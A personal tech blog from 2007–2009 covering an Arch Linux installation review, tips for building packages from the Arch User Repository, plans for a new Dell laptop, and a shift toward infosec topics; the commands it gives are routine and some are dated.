Thursday, January 29, 2009

Change in Format

Well, this is my first post in almost a year and a half. I haven't been able to keep up with the blog as much as I had hoped so the new plan is to refocus the subject matter. Bear with me for a moment.

When I started the blog, the plan was to rant on just about anything that struck my fancy, mostly computer-related. Well, that sounds all well and good but it was actually quite limiting. I wanted to talk about anything and everything and I just didn't have the time for that. So now, the plan is to talk about computer security (or INFOSEC) related issues that arise. The thing about that is there are a million blogs/websites concerning computer security so I'm only going to talk about those that I feel I have a particularly insightful take on. That should limit the content by itself since there are many in the security industry far more knowledgable than me. I sitll may make the occasional divergence into some topic completely non-related to INFOSEC and I hope whatever readers I do have will forgive me for that.

Anyways, I'm working on my first "new format" idea so I'll try and have that post up ASAP.

Wednesday, September 26, 2007

New (Good) Post Coming Soon

I know I haven't posted anything in a while but that's because I really have nothing to post about. Sure, I could ramble on about something non-computer related that was bothering me but no one wants to hear about that so I try to keep this blog mostly related to tech and computer stuff. The problem is: since I've been running Arch, I haven't had any problems worthy of making a post about. Everything in Arch "just works" to the point that posting something about it would be unnecessary. Heck, even just a couple of days ago, I had what I thought would be a major project in turning my Arch install into a temporary LAMP server for an upcoming school project. I thought this would require a lot of my time, thinking I could make a good post about it that would really help someone out. But the whole thing was done in a matter of 5 minutes! If you just follow the directions on the Arch Wiki about LAMP, it really is idiot-proof. I love this distro!

Alas, now I do have something worthy of posting. I ordered a laptop last week (yay). It's a Dell D630 and my company paid for it (suckers!). Yet it is my personal laptop and I take it with me wherever I go even if I leave the company. Anyways, here are a few of the specs:

Intel Core 2 Duo T7300, 2.00GHz, 800MHz 4M L2 Cache, Dual Core
14.1 inch Wide Screen WXGA LCD for Latitude D630
2.0GB, DDR2-667 SDRAM, 2 DIMM for Dell Latitude Notebooks
Intel Integrated Graphics Media Accelerator X3100 Latitude D630
80GB Hard Drive 9.5MM 7200RPM for Latitude DX30
Touchpad with UPEK fingerprint reader, Latitude D630
Dell Wireless 360 Bluetooth Module for XP, Latitude
90W AC Adapter for Latitude D-Family, Factory Tied
8X DVD+/-RW w/ Roxio Creator
Intel 3945 WLAN (802.11a/g) mini Card Latitude, Factory Install

I must say, it's a pretty nifty machine, even though I haven't even received it yet. The one thing that bums me out a little bit is that they didn't have the WXGA+ screen available. The sales rep said it would delay my shipment 20 days if I wanted it so I just did away with it.

Anyways, my plan is to shrink the pre-shipped Windows partition down to about 10 GB, or however small I can make it while still being able to do some basic development work on it, and then install Arch to the rest of the hard drive. My company won't let me do away with Windows completely so I have to keep it around. I'm also going to make XFCE the Desktop Environment. I wanted a (relatively) light GUI to keep battery usage to a minimum and decided on XFCE. I thought about Openbox or Fluxbox but the truth is I don't have enough experience with any of those really lightweight window managers to feel confident in installing them and configuring them to my liking. Unfortunately, I'm not the ├╝ber nerd some members of the Arch Forum are that can configure one of those to look really good. That's not meant to offend anyone who does possess the capability; I envy their talents and effort but don't really have the time nor the inclination to study up on those things. Maybe I'll do that one day down the road but I'd like to get a working system first and then experiment with them.
So, my plan is to get everything working: wireless, bluetooth, fingerprint reader and all the other little gizmos that come with the D630. I'm going to document the whole thing and post the results and associated process(es) that came along with it for the benefit of anyone who plans to install Arch on a similar laptop with similar hardware. I think I'll even make an entry on the Wiki about it seeing as how there currently isn't one. There's a very sparse entry for the D620 (the previous generation of the 630) but it doesn't offer much in the way of help. So, stay tuned for that. I've already started researching and am excited about getting this baby up and running. In my experience, Linux is an entirely different beast on laptops so it should be interesting.

Monday, July 16, 2007

A Lesson in AUR

So, after using Arch for a couple of months, I've gained some valuable knowledge that might be of some use for someone new to or interested in Arch. After getting most of what I needed for a suitable system from Arch's repos, I decided to expand my horizons a bit and try installing some packages from the Arch User Repository or AUR. There are lots of packages available in the AUR. Most of them aren't what you'd consider required packages but rather ancillary programs that are nice to have around for convenience's sake.

Here's a list of just some of the apps I installed from the AUR:
Cairo Clock
As you can see, most of these programs aren't required for most users, with the possible exception of Skype, but they are nice to have around. If these programs, or another you've found by searching the AUR, are interesting to you I'll give you some tips on how to use the AUR. Keep in mind that the following aren't official directions (consult the many Arch Wiki entries for that), simply a collection of observations I've picked up by working my way through the AUR.

The first thing you'll want to do is enable the community repository in /etc/pacman.conf. This is a very simple step, just uncomment the entry for it. Then you'll want to install some tools that you'll need to create a suitable package for your system based on the tarball that's available in the AUR. Use pacman to install makepkg, fakeroot and versionpkg. You may also need subversion if you plan on installing things with svn.

Now that you've got the tools, go to the AUR's website and find the package that you'd like to install. Download the tarball and copy it to /var/abs/local. This will be your working directory for most AUR-related operations. You can also use ~/builds if you'd like but I like to keep /home separated from everything else whenever I can. You can use it if you'd like, it will prevent some annoying permissions problems when installing things.

The next step is to extract the package which will creaet a new directory that you will then "cd" into. Once there, check the PKGBUILD file for any malicious commands. If anything looks suspicious, DO NOT proceed. If everything's copasetic, then create a package for pacman to install by running makepkg. If successful, this will create a .pkg.tar.gz file that can then be instaleld by running:
#pacman -U package_name.pkg.tar.gz
Then, the program can be run just like any other. In fact, in most cases, if you're using Gnome, an entry will automatically be made to the menu. Basically, if makepkg doesn't fail, you're set. In some cases (if you're using an i686 processor), you'll get an error, something about an architecture not being described. If you get that, simply add a line to the PKGBUILD file that looks like this: "arch=('i686')".

This is the standard practice for installing packages from the AUR but if you are looking for a more streamlined approach you may want to try aurbuild. aurbuild is a tool that will essentially perform all of the steps described above for you. You can install it from the AUR with the method I described above and then install packages from the AUR with:
#aurbuild -sa package_name
You should read the man page on aurbuild to understand all of the command line options but that is the generic command to install something.

I should mention that I've only had about a 80% success rate when trying to install something from the AUR. I sometimes get an obscure error message that leaves me a little unsure of what to do next. Even when I install something successfully, I still have problems trying to run it. I've had a few segmentation faults which I don't really feel like sorting through. I had enough of debugging seg faults in college; it's not something I enjoy doing.
Anyways, I hope you've learned a little bit about arch and a little bit about the AUR from this article, at least enough so that you could install something from there if you so desired. Good luck.

Friday, June 22, 2007

Arch Linux: An Observational Review

Having spent two solid years using Redhat/Fedora products, I began to look for a new Linux distribution that would satisfy my needs as a user but eliminate some of the bloat of the RPM-based distribution I’ve grown so accustomed to. I tried all of the more popular distros: Ubuntu, SuSE, Debian and MEPIS but none of them seemed to possess any of the more streamlined qualities I was looking for. My quest eventually led me to Arch Linux.

Arch Background
Arch is a relatively young distribution that has its roots in Canada. Its founder, Judd Vinet, professes the Arch Way on the distro’s Wiki:
freedom of choice, keep it simple, learning, and user-control

These principles have shaped Arch into an advanced, lightweight distribution intended for the more experienced Linux user.

If you plan on installing Arch, you should have at least a moderately experienced background installing and using Linux systems. Arch is not impossible for newbies to install and use, in fact there is a section of the Arch wiki devoted explicitly to this demographic, but it will require you to configure some aspects of your system by yourself. While this guide requires at least a cursory knowledge of your system, it does walk you through some of those manual configurations. Still, you’ll need to know something about your hard drive’s partitioning scheme and your network layout.

On that note, I feel obliged to mention that Arch seems to be a distribution that functions best on a high speed Internet connection. This isn’t mandatory but if you plan on installing a Desktop Environment/Window Manager (KDE, Gnome, XFCE, Fluxbox…) you’ll have to download it from Arch’s repositories (they’re not available on the install CD) and this process can be difficult on a dialup connection.

Moving on, my Arch install process was split up into 8 steps:

1. Run Setup
2. Prepare Hard Drive
3. Select Packages
4. Install Packages
5. Configure System
6. Install Kernel
7. Install Bootloader
8. Exit Install

1. The first step is simple, just run /arch/setup from the command prompt when you boot your computer with the Install CD in your CD-ROM drive.

2. Preparing the hard drive can be automated by the install process but this automation will blow away your entire hard drive. If you need to keep a Windows or other Linux partition around, you’ll have to configure this step yourself. Don’t fear! It’s not difficult if you know which partitions you need to keep.

3. By default, Arch only installs a minimal system, allowing you to fine-tune your system as you see fit. However, you can add some packages that you know you’ll need by checking the boxes next to the software that you want installed. Arch recommends only installing the default package set but you are free to add what you need. Again, this process is very straightforward.

4. Installing the packages you’ve selected requires pressing Enter on the keyboard. How difficult is that? The process may take a couple of minutes, depending on the size of your package selection.

5. Configuring your systems will probably be the most difficult part of the install process for you. You can choose not to edit any system files at all but this may hinder your system’s functionality and performance after the install process. This step involves editing some of the files in /etc including rc.conf, hosts, fstab, modprobe.conf, modules.conf, resolv.conf and profile. If you have no idea what any of these files do or don’t even know where to start in terms of editing them, don’t worry, the install guide explains each of their functions within the system and it can help you determine what you do need to add/change/edit, if anything.

6. Installing the kernel essentially means just choosing which kernel is best for you but Arch recommends installing the 2.6.x kernel with support for SATA/SCSI/IDE. The actual installation of the kernel will be done for you by the installer.

7. Same goes for installing the bootloader. Just choose if you want GRUB or LILO. I chose GRUB simply for familiarity’s sake.

8. Exiting the install will reboot your computer and drop you into a command prompt.

All told, it took me about 10 minutes to complete the install and most of that time was spent setting up a partitioning scheme that included a Windows partition, another Linux partition, a swap partition and a home partition that I planned on sharing between the two Linux systems.

System Setup
You now have a fully functioning Arch system but we’re not done yet. At the command prompt, you are greeted by a text login screen. Login with the username of root and no password. The first thing you’ll probably want to do is set a password for root. This can be done with the following command:
passwd root

You’ll then be asked twice to enter a password for root. Remember that the next time you log in as root, you’ll have to enter that password. The next thing I recommend doing is to set up a regular user. As root, you can do this with the following command:
useradd –m –s /bin/bash myuser

Replace “myuser” with the username that you wish to have. It would then be wise to create a password for that user. This can be done with the same method that you created a password for root.

Now that you have a proper user configuration, you’ll want to connect to the Internet and use pacman to update your system. The first thing to determine is if your machine has an active Internet connection. An easy way to do this is to ping Google:

If you get a response from Google (i.e. you received packets from them) you’re ready to proceed. If you got an “unknown host” error, you still have some tinkering to do.

First, check to see if you have an IP address with

If you do, check the contents of your /etc/resolv.conf file. This file tells the computer where to look for a DNS server. If the file is not populated with the IP addresses of your ISP’s DNS Servers, add these two lines to it:

These two IP addresses are for the OpenDNS servers that are freely accessible. The last thing to check is your routing table. If you’re behind a router, say on a home network, you’ll have to add that router’s IP address to the routing table as the default gateway. Details for this procedure can be found later in the article.

Package Management
As a somewhat experienced Linux user, hopefully you are familiar with the concept of package management. Maybe you’ve used package managers like apt-get, yum, urpmi or portage. Well, Arch Linux has its own package manager and it is called pacman. Arch is a binary based Linux distribution that uses .pkg.tar packages. Using pacman to install these packages will keep you from experiencing the inevitable headaches that come with trying to install source packages yourself.

Like other package managers, pacman has access to online repositories, from which it can install any software you’d like. There are two default pacman repositories: current and extras. Most software can be retrieved from one of these two but there is also a third repository that you can add if you wish. This third repository is the Arch User Repository (AUR) and contains packages contributed by Arch users. With these three repositories, you would be hard-pressed to find a piece of software you need that could not be installed with pacman. Instructions for using the AUR can be found here.
Pacman usage is rather straightforward. I won’t go into great detail on this subject (you can find an entry for pacman on the Arch Wiki) but I will give you some basic commands that you’ll need to install/remove packages and update your system. Pacman is divided into operations (which are denoted by capital letters) and options (denoted by lowercase letters). Keep in mind that these commands require root privileges. To perform a full system upgrade, execute:
pacman –Syu

The “S” option syncs the local package database (on your machine) with the repositories’ package database. The “y” option refreshes the package list on your machine with the package list from the online servers. The “u” option performs the actual upgrade. You should execute this command after installation and everyday thereafter. To install a package, execute:
pacman –S package_name

We’ve already mentioned what the “S” option does, appending a package name to the end of the command will search the online repositories for that package name, download the package (along with its required dependencies) to your machine and install it. To remove a package, execute:
pacman –R package_name

This is a generic remove command. It is recommended that you consult the Arch Wiki and pacman manual for a more refined method of removing packages. To query the online repositories to check for the existence of a certain package, execute:
pacman –Ss package_name

The “s” option is a search operation for the sync databases. To search your own system to see if a package is already installed, execute:
pacman –Qs package_name

The “Q” option queries the local database and, combined with the “s” option, can tell you whether or not a certain package is installed.

As you can see, pacman is very easy to use but I must reiterate: read through the pacman page on the Arch Wiki and the pacman manual. After your install, you can use pacman to install a Desktop Environment/Window Manager. Consult the Wiki for more details.

Personal Observations
Well, so far I have tried to maintain a degree of objectivity; giving new Arch users a rundown of the experience I had installing Arch and advising them on some of the tips that helped me get a working system. I have been using Arch for approximately two months and I have grown very fond of it. It has fulfilled my needs as a lightning fast distribution with a simple philosophy. It has the added bonus of having a terrific foundation. The Arch Wiki, discussion board and AUR are all officially endorsed by the project and can be found on the same website.

I will now try to describe a couple of the problems I had installing and setting up my system and how I resolved them:

• Initially, the installer recognized my hard drive as hda (as most distributions did seeing as how it is an IDE drive). However, after installation and running a pacman -Syu, I rebooted to a terrible error about superblock not describing a correct ext2 filesystem. After much googling, I realized that the system upgrade had replaced my kernel with a new one that the new one recognized my hard drive as sda(it seems most of the newer releases of the major distributions are doing this now).The fix was fairly simple, I just had to change the entry in /boot/grub/menu.lst to compensate for this change.
• I also did not have an active internet connection. My router had leased me an IP address, my /etc/resolv.conf had set up the appropriate DNS servers but I couldn't connect to the internet. After yet even more googling, I found that I had to set my router as the default gateway in my routing table. This was done with the following command:

route add default gw dev eth0

What I really like about Arch is that all the software I need is available in one of the three repositories. As a long time Fedora user, I was used to the process of importing third party repositories to install software that I needed. I was always weary of that method but I’m happy to report that I have now equipped my Arch system with every piece of software I’ve ever used on Linux (with the superb guidance of the Arch Wiki), and all of it was contained in Arch’s repositories. There’s also no need to download the latest releases of Arch as they are made available. Simply running pacman –Syu will upgrade your system to the latest.

Another thing I really like about Arch is that it’s lightning fast, even with a Gnome desktop. There are significant performance improvements over any distribution I’ve used in the past. If I ever got into any of the lighter WM’s like Openbox or Fluxbox, I can imagine just how powerful the system can get.

The last thing I want to mention about Arch is the Arch Build System (ABS). The ABS is used to build packages for software that is not yet available and to customize existing packages for your system. You would probably not have a need for the first option but if you have auxiliary hardware that needs to be integrated with the kernel, it may be necessary to compile drivers using the ABS.

I may have found my new everyday distribution. Arch is very fast and efficient but that performance doesn’t come at the cost of ease of use. Pacman is the best package manager I have used; anything you need to know how to do can be found on the Arch Wiki and any software you need can be found in the Arch repositories. I would encourage anybody looking for a simple, fast Linux distribution to give Arch a test drive. If you have a good knowledge base with Linux systems, you may find yourself to be a devoted Archer.

Thursday, June 21, 2007

First Blog Post

Somehow you've straggled across my blog. I don't know how; I haven't linked to it anywhere. But anyways, I'll post here anything I think is interesting or useful to others. Most entries will probably be about or relating to Linux. I'm a big fan of open source software and am willing to help anybody make the transition to it if they so desire.

Now a little about myself:
I am a software engineer for a government contractor here in Northern Virginia. I have experience with various languages including, but not limited to Java, C/C++, Perl, Python and Bash. I also have experience with Information/Network Security, various protocols and server applications. My knowledge is nowhere near perfect (nobody's is) but I am willing to help you out with what I can. Most of this knowledge is centered around Linux environments but not entirely. I am a proficient Windows user.

I graduated with a Bachelor's Degree in Computer Science with a minor in Mathematics and I am currently working towards a Masters Degree in Information Security. I enjoy golfing, fishing and watching all kinds of sports but most of all, I like to spend time with good people.

I guess that's about it for now. If I think of anything to talk about, I will post it here and you can feel free to use whatever advice you can take from this pathetic little blog.